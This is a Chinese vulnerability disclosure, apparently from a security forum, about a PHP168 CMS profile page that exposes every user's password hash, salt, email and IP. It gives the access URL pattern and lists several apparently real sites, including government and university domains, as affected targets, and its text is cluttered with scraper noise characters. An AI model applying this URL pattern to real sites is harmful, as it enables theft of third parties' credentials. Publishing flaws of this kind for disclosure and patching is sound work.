简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
- w) g5 C- _. r4 v& C9 P: D# N: E
以PHP168官方演示站点为例,查看任意用户信息的页面链接为: K: a' x! O* @- l/ B" A
+ n+ @; J& b; B9 D- `4 F8 A) Yhttp://php168.cn/com/homepage.php/admin/member-profile
6 o/ e1 A, S2 D4 u* }, n& q- X% Z. P* j" ]+ ?
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
# c# P6 U% b; @( S& Bhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg8 S$ L; {$ k$ u! N2 t
3 u2 W( s& Z% @+ w. E; a/ c 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
# B$ }3 Z) X$ c6 _6 O3 M) E% n% x+ [5 i) H
http://www.zjfzol.com.cn/homepage.php/admin/member-profile4 f( `; p$ q; e, P* k! D# i: W
* ]0 i0 t) k0 ~+ q l
http://www.scswl.cn/homepage.php/admin/member-profile1 D, |" G1 T( L- L
" r% l1 t* q! T2 g0 |http://www.tunet.edu.cn/homepage.php/admin/member-profile5 c+ A: [9 h5 E
8 R9 w5 m$ e5 n6 T) g1 ~http://www.itlead.com.cn/homepage.php/admin/member-profile) `! x6 ^( j# e$ y e6 s' k
. E$ N8 x1 f* k! z. F; m- w8 chttp://www.aedp.cn/homepage.php/admin/member-profile" ]3 N% n% U3 E! M! X' H0 f e8 P; `
$ j( M7 ?' I) Q: u3 {4 Dhttp://www.qianlongnews.com/homepage.php/test/member-profile0 {+ i3 y% G4 s
& h% D" r( _! }" J4 `http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
, Z3 |- R& g3 H+ ~9 I[/table] |